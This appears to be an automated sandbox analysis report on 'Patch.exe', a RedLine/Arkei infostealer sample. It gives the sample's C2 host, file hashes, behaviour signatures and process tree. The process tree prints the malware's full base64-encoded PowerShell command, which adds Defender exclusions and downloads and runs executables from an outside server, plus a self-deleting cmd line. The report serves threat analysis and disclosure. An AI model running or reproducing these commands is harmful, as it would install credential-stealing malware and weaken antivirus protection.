Analysis

  • max time kernel
    54s
  • max time network
    57s
  • platform
    windows10-1703_x64
  • resource
    win10-20220812-en
  • resource tags

    arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
  • submitted
    19-08-2022 21:40

General

  • Target

    Patch.exe

  • Size

    174KB

  • MD5

    9d976aa0b7b02302e0e89466040080d0

  • SHA1

    70c91eee4491050908bb74c5c00ff0f01efff7a3

  • SHA256

    3ec60ccea3fec48d3ea33c63d7d66ec1d3badb174963e8dffe8ce528473c6886

  • SHA512

    c8b1c3ff4a21baf629147271ce57b7762e692cf94fb430b10e0eab22c0833d7881b1a6724a08844abe0dc98a4f964ef1766edbbf7515bde365a4fc453b94dfcd

Malware Config

Extracted

Family

redline

Botnet

1877

C2

overthinker1877.duckdns.org:60732

Extracted

Family

arkei

Botnet

Default

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Patch.exe
    "C:\Users\Admin\AppData\Local\Temp\Patch.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1884
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAegBzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAawB4AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQBoAGYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdABnAGoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADMALgA5ADAALgAxADIAOAAuADIANQAzAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHMAdgBzAGgAbwBzAHQAcwAuAGUAeABlACcALAAgADwAIwB1AG0AcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHEAbQBuACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAG4AbABxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBzAGgAbwBzAHQAcwAuAGUAeABlACcAKQApADwAIwBrAGoAcAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQAzAC4AOQAwAC4AMQAyADgALgAyADUAMwAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBzAHYAYwBoAG8AcwB0AHMALgBlAHgAZQAnACwAIAA8ACMAeABsAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAbQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB2AGEAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHYAYwBoAG8AcwB0AHMALgBlAHgAZQAnACkAKQA8ACMAbABzAGQAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAMwAuADkAMAAuADEAMgA4AC4AMgA1ADMALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AcwB2AGMAaABvAHMAdAAuAGUAeABlACcALAAgADwAIwB1AHcAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHoAdQB5ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGQAdgBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAnACkAKQA8ACMAeABjAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBoAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAcABwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBzAGgAbwBzAHQAcwAuAGUAeABlACcAKQA8ACMAcAB4AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZwByAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAG0AagB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBjAGgAbwBzAHQAcwAuAGUAeABlACcAKQA8ACMAaABtAGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbAB3AGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAYQBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAnACkAPAAjAGEAcwBrACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4380
      • C:\Users\Admin\AppData\Local\Temp\svshosts.exe
        "C:\Users\Admin\AppData\Local\Temp\svshosts.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks processor information in registry
        • Suspicious use of WriteProcessMemory
        PID:3848
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\svshosts.exe" & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4216
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 5
            5⤵
            • Delays execution with timeout.exe
            PID:3252
      • C:\Users\Admin\AppData\Local\Temp\svchosts.exe
        "C:\Users\Admin\AppData\Local\Temp\svchosts.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2176
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        3⤵
        • Executes dropped EXE
        PID:2680

Network

MITRE ATT&CK Matrix ATT&CK v6

Credential Access

Credentials in Files

2
T1081

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Collection

Data from Local System

2
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\svchosts.exe
    Filesize

    205KB

    MD5

    b3503746bb7f1d30755c9f4a26ce0a2c

    SHA1

    2490c2a6b3fad0711993c8bb16aab2d21cefac6f

    SHA256

    90706da9b2d8dca13b4823cb9b6c95bde3df92ac336826722b33cfe495d2e300

    SHA512

    142841d0e5a51212af7f7ae6cd083eb5daa2e5542f3c8294524ff8c722a4dcbe8462bf647f928ba3b3edb4d36638a4be5a83ad5762e9b8e66429f6006901b72c

  • C:\Users\Admin\AppData\Local\Temp\svchosts.exe
    Filesize

    205KB

    MD5

    b3503746bb7f1d30755c9f4a26ce0a2c

    SHA1

    2490c2a6b3fad0711993c8bb16aab2d21cefac6f

    SHA256

    90706da9b2d8dca13b4823cb9b6c95bde3df92ac336826722b33cfe495d2e300

    SHA512

    142841d0e5a51212af7f7ae6cd083eb5daa2e5542f3c8294524ff8c722a4dcbe8462bf647f928ba3b3edb4d36638a4be5a83ad5762e9b8e66429f6006901b72c

  • C:\Users\Admin\AppData\Local\Temp\svshosts.exe
    Filesize

    161KB

    MD5

    36b190e42e0322b838447fb46098e162

    SHA1

    ab3e9669f8e50f68e4086943be05b0de245f8b16

    SHA256

    1812d5a1466bca0681c49479e7f026d48d6c3dbb5c2a082f288eb4f4578670c4

    SHA512

    3080d6bd06ce32140ffa5baf5a3c08d0eb8debe0e5cd6904ade61a783c82537e912a62c925867ed860691626d0a217d6ff7b98a8c42078ff4faba35409f25e4b

  • C:\Users\Admin\AppData\Local\Temp\svshosts.exe
    Filesize

    161KB

    MD5

    36b190e42e0322b838447fb46098e162

    SHA1

    ab3e9669f8e50f68e4086943be05b0de245f8b16

    SHA256

    1812d5a1466bca0681c49479e7f026d48d6c3dbb5c2a082f288eb4f4578670c4

    SHA512

    3080d6bd06ce32140ffa5baf5a3c08d0eb8debe0e5cd6904ade61a783c82537e912a62c925867ed860691626d0a217d6ff7b98a8c42078ff4faba35409f25e4b

  • C:\Users\Admin\AppData\Roaming\svchost.exe
    Filesize

    14KB

    MD5

    1937d5a853734874a0ef18d4acc43113

    SHA1

    37c4f8d0c6fea50f836c0a308b06de910205189a

    SHA256

    88e6238b9329ac7eca5ff20016f896c4869760a44e2da20cfd070bf83db52d64

    SHA512

    e43cbf94a70683649ac126a68d37f0d69bb581864e5e1a6076f9a09e2a3a89f88b436d3ef41300af873ea1fc70f3fdb75fe69288bcf5c17ef100b4b802478a28

  • C:\Users\Admin\AppData\Roaming\svchost.exe
    Filesize

    14KB

    MD5

    1937d5a853734874a0ef18d4acc43113

    SHA1

    37c4f8d0c6fea50f836c0a308b06de910205189a

    SHA256

    88e6238b9329ac7eca5ff20016f896c4869760a44e2da20cfd070bf83db52d64

    SHA512

    e43cbf94a70683649ac126a68d37f0d69bb581864e5e1a6076f9a09e2a3a89f88b436d3ef41300af873ea1fc70f3fdb75fe69288bcf5c17ef100b4b802478a28

  • \ProgramData\mozglue.dll
    Filesize

    133KB

    MD5

    8f73c08a9660691143661bf7332c3c27

    SHA1

    37fa65dd737c50fda710fdbde89e51374d0c204a

    SHA256

    3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

    SHA512

    0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

  • \ProgramData\nss3.dll
    Filesize

    1.2MB

    MD5

    bfac4e3c5908856ba17d41edcd455a51

    SHA1

    8eec7e888767aa9e4cca8ff246eb2aacb9170428

    SHA256

    e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

    SHA512

    2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

  • memory/1884-135-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-156-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-127-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-128-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-129-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-130-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-132-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-133-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-134-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-120-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-131-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-136-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-137-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-138-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-139-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-140-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-141-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-142-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-143-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-144-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-145-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-146-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-147-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-148-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-149-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-150-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-151-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-152-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-153-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-154-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-155-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-126-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-157-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-158-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-159-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-160-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-161-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-162-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-121-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-122-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-123-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-124-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/1884-125-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/2176-644-0x0000000004EB0000-0x0000000004EEE000-memory.dmp
    Filesize

    248KB

  • memory/2176-699-0x0000000006940000-0x000000000695E000-memory.dmp
    Filesize

    120KB

  • memory/2176-523-0x0000000000000000-mapping.dmp
  • memory/2176-636-0x00000000029F0000-0x0000000002A02000-memory.dmp
    Filesize

    72KB

  • memory/2176-686-0x0000000006B00000-0x000000000702C000-memory.dmp
    Filesize

    5.2MB

  • memory/2176-685-0x0000000006400000-0x00000000065C2000-memory.dmp
    Filesize

    1.8MB

  • memory/2176-656-0x0000000005150000-0x000000000525A000-memory.dmp
    Filesize

    1.0MB

  • memory/2176-654-0x0000000002A10000-0x0000000002A5B000-memory.dmp
    Filesize

    300KB

  • memory/2176-624-0x0000000000610000-0x0000000000648000-memory.dmp
    Filesize

    224KB

  • memory/2176-633-0x0000000005610000-0x0000000005C16000-memory.dmp
    Filesize

    6.0MB

  • memory/2680-538-0x0000000000000000-mapping.dmp
  • memory/2680-620-0x0000000000BE0000-0x0000000000BEA000-memory.dmp
    Filesize

    40KB

  • memory/2680-643-0x0000000005F00000-0x0000000005F92000-memory.dmp
    Filesize

    584KB

  • memory/3252-799-0x0000000000000000-mapping.dmp
  • memory/3848-794-0x0000000000400000-0x000000000043E000-memory.dmp
    Filesize

    248KB

  • memory/3848-512-0x0000000000000000-mapping.dmp
  • memory/3848-544-0x0000000000400000-0x000000000043E000-memory.dmp
    Filesize

    248KB

  • memory/4216-792-0x0000000000000000-mapping.dmp
  • memory/4380-169-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-199-0x0000000006AB0000-0x0000000006AE6000-memory.dmp
    Filesize

    216KB

  • memory/4380-204-0x0000000007120000-0x0000000007748000-memory.dmp
    Filesize

    6.2MB

  • memory/4380-219-0x00000000070B0000-0x00000000070D2000-memory.dmp
    Filesize

    136KB

  • memory/4380-223-0x00000000078E0000-0x0000000007946000-memory.dmp
    Filesize

    408KB

  • memory/4380-225-0x0000000007950000-0x00000000079B6000-memory.dmp
    Filesize

    408KB

  • memory/4380-226-0x0000000007BA0000-0x0000000007EF0000-memory.dmp
    Filesize

    3.3MB

  • memory/4380-229-0x0000000007A80000-0x0000000007A9C000-memory.dmp
    Filesize

    112KB

  • memory/4380-230-0x0000000008450000-0x000000000849B000-memory.dmp
    Filesize

    300KB

  • memory/4380-234-0x00000000081D0000-0x0000000008246000-memory.dmp
    Filesize

    472KB

  • memory/4380-247-0x0000000009120000-0x0000000009153000-memory.dmp
    Filesize

    204KB

  • memory/4380-248-0x0000000009100000-0x000000000911E000-memory.dmp
    Filesize

    120KB

  • memory/4380-257-0x0000000009170000-0x0000000009215000-memory.dmp
    Filesize

    660KB

  • memory/4380-261-0x0000000009620000-0x00000000096B4000-memory.dmp
    Filesize

    592KB

  • memory/4380-464-0x00000000095D0000-0x00000000095EA000-memory.dmp
    Filesize

    104KB

  • memory/4380-178-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-184-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-183-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-182-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-181-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-180-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-179-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-175-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-177-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-176-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-174-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-173-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-170-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-172-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-171-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-168-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-167-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-166-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-165-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-164-0x0000000077410000-0x000000007759E000-memory.dmp
    Filesize

    1.6MB

  • memory/4380-163-0x0000000000000000-mapping.dmp
  • memory/4380-469-0x00000000095C0000-0x00000000095C8000-memory.dmp
    Filesize

    32KB

  • memory/4380-483-0x0000000009D50000-0x000000000A3C8000-memory.dmp
    Filesize

    6.5MB

  • memory/4380-484-0x00000000096D0000-0x00000000096EA000-memory.dmp
    Filesize

    104KB

  • memory/4380-489-0x0000000009750000-0x0000000009772000-memory.dmp
    Filesize

    136KB

  • memory/4380-490-0x000000000A3D0000-0x000000000A8CE000-memory.dmp
    Filesize

    5.0MB